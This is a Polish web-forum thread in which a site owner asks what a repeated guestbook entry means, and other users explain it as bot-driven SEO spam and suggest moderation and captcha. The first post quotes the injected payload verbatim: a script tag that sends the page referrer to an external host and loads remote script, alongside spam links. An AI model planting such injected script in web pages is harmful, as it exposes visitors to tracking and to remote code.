Pokaż wyniki 1 do 8 z 8

Temat: Wpis do księgi gości

  1. #1
    Zarejestrowany
    Sep 2007
    Postów
    2

    Domyślnie Wpis do księgi gości

    Witam
    dziś ktoś wpisał trzykrotnie do księgi gości na mojej stronie taki kod:

    gkl3n8u-mlm1zf5-tw6q6ff6-0 <script>var r = document.referrer;
    document.write('<script src="http://www.stats-log.com/gb.php?id=g&r='+escape(r)+'"><' + '/script>')</script>
    http://www.designcommunity.com/cgi-b.../cialis.html#1 <br /><a
    href="http://www.designcommunity.com/cgi-bin/mlk?http://www.pillswithoutprescription.com/bontril_sr.html#2">bontril</a>
    <br />blackjack online <br
    />http://www.designcommunity.com/cgi-b...sandaces.com#4 <br
    />[http://www.designcommunity.com/cgi-b...sandaces.com#5 blackjack] <br
    />"bontril":http://www.designcommunity.com/cgi-b...tril_sr.html#6 <br
    />[LINK http://www.FREE-SLOTS.TK#7]free slots[/LINK]



    Dodam że wpisy były dokonywane co ok. 12 min i za każdym razem z innym numerem IP.

    I mam pytania:
    Co to za wpis?
    jakie ma zadanie?
    Czy to niebezpieczne?

    Na stronie mam ustawione że jak ktoś wpisze wpis do księgi gości czy skomentuje newsa albo cokolwiek to jest wysyłany do mnie email z treścią wpisu datą, godziną i numerem IP wpisującego i teraz znowu pytanie czy cokolwiek może mi ktoś zrobić jak te wpisy są przesyłane do mnie na email a ja dopiero ręcznie dodaje je do kodu strony?

    Czy ma to za zadanie przechwycenie hasła i loginu (mam możliwość dodawania newsów przez stronę www i czasami tak robię).
    Czy jest jakiś dobry program który pokaże mi chociaż z jakiej sieci ktoś to zrobił jak mam jego IP cokolwiek jakąkolwiek lokalizację.
    Dziękuję za wszelką pomoc.

  2. #2
    Zarejestrowany
    Dec 2006
    Postów
    726

    Domyślnie

    roboty atakują, poczytaj w necie jest sporo sposobów żeby sie przed tym uchronić.
    "dobrzy hakerzy są sławni na cały świat, ale o hakerach geniuszach nikt nic nie wie."

  3. #3
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    To najprostszy spam... po prostu ustawic aby bez zatwierdzenia admina nie bylo publikowane i cierpliwie usuwac poczte ze skrzynki Nie martw sie, nie jestes sam w tej materii.
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  4. #4
    Avatar Nikow
    Nikow jest offline -=[ZRP]=-
    Zarejestrowany
    Sep 2007
    Skąd
    Różne zakątki sieci.
    Postów
    995

    Domyślnie

    Walnij captche i po krzyku Skuteczność 99,9%

  5. #5
    Zarejestrowany
    Sep 2007
    Postów
    2

    Domyślnie

    Dzięki serdecznie uspokoiliście mnie.
    mam właśnie tak ustawione że treśćprzychodzi do mnie w mailu
    A czy takie wpisy jeżeli dostaną się na stronę to programy antywirusowe mogą pokazywać że jest na stronie wirus?
    Mój poprzednik (pracownik odpowiedzialny za stronę) też dostawał takie wpisy ale były one umieszczane na stronie automatycznie) i programy antywirusowe pokazywały przy wejściu na stronę księgi gości obecność wirusa.
    Po pewnym czasie okazało się że wszystkie newsy napisane przez niego zostały skasowane (newsy dodaje się przez wpisanie loginu i hasła na stronie www) Ktoś przejął jego hasło i wykasował wszystkie newsy jakich był właścicielem.

    Czy mają związek takie wpisy do księgi gości z przejęciem loginu i hasła wpisywanego na stronie www?

    Dzięki

  6. #6
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Absolutnie nie ma to nic wspolnego z haslem... Zobacz - prowadzisz strone, pozwalasz na komentowanie newsow - musisz sie liczyc z tym, ze niektore beda nieodpowiednie, itd...

    Co gorsze, jest wiele automatow, ktore wchodza na strony WWW, szukaja forow, ksieg gosci, artykulow ktore mozna komentowac, itd i wrzucaja tam swoj spam - reklamy tabletek na potencje, reklamy stron z panienkami, reklamy czegokolwiek... a czasami zamieszczaja niebezpieczne skrypty na stronie (wtedy antywirus ma prawo sie zbuntowac i powiedziec ze otwierasz cos niebezpiecznego, nawet jesli to Twoja wlasna strona).


    Pytanie zasadnicze - po co to wszystko? Po to aby pozycjonowac swoja strone w wyszukiwarkach Im wiecej stron ma link do Twojej tym wyzej strona idzie do gory. Taki spam to idealny sposob napedzania sobie linkow - puszczasz robota, on leci i dopisuje Twoja strone - za darmo, bez wiedzy usera, bardzo czesto publikacja jest natychmiastowa (wpis w ksiedze gosci, itd).

    Jak blokowac - moderacja komentarzy, captcha (obrazek do przepisania), oraz sporo cierpliwosci. Przede wszystkim nie zezwalac na automatyczna publikacje - co wchodzi z zewnatrz musi byc zatwierdzane przez czlowieka, niezaleznie od tego jakie sposoby zabezpieczenia sie przed spamem stosujesz.

    Realia?
    Pod tym postem w moim podpisie jest link do mojego blogu. Maly blog pol na pol polsko-angielski... Dziennie mam na serwerze nieco ponad 1000 wejsc z czego tak na prawde niecale 10% to ludzie, reszta to roboty (to da sie rozpoznac z ogromna dokladnoscia). Z tych powiedzmy 900 wizyt robotow dziennie mam okolo 10-20 komentarzy zawierajacych spam i to KAZDEGO DNIA! Co najciekawsze - wszystkie komentarze przychodza do artykulu napisanego w jezyku polskim, ktorego zasieg ze tak powiem w jakim artykul jest znany ogranicza sie do ludzi znajacych jezyk polski, podczas gdy artykuly anglojezyczne sa przeznaczone generalnie dla 'reszty swiata'. Dlaczego akurat ten URL dostaje tyle spamu?! Nie wiem... to tez dosc proste ale juz nie na ta wypowiedz.
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  7. #7
    31337 jest offline Banned
    Zarejestrowany
    Apr 2007
    Postów
    367

    Domyślnie

    To najprostszy spam... po prostu ustawic aby bez zatwierdzenia admina nie bylo publikowane
    No bez przesady...

    Najlepiej przepisywany token, generowany na podstawie ip, daty, rand() i innych czynników =)

  8. #8
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Hehe... milo mi ze ktos czyta to co pisze

    Dzisiaj po opublikowaniu mojej odpowiedzi powyzej, mialem 9 specyficznych wpisow w logu... a dokladnie prob 'wstawienia' wlasnych wpisow na blogu przechodzac od prostych belkotlowych wpisow konczac na probie XSS i SQL injection.

    Fajnie czyta sie pozniej logi z tego co sie dzialo... mozna sie z nich wiele nauczyc - zwlaszcza majac kilkadziesiat do kilkuset wpisow z roznych miejsc i o roznej tresci. Jakby ktos kiedys pytal czym sie zajmuje jak nie pracuje, to juz wieceie - czytam logi :P
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52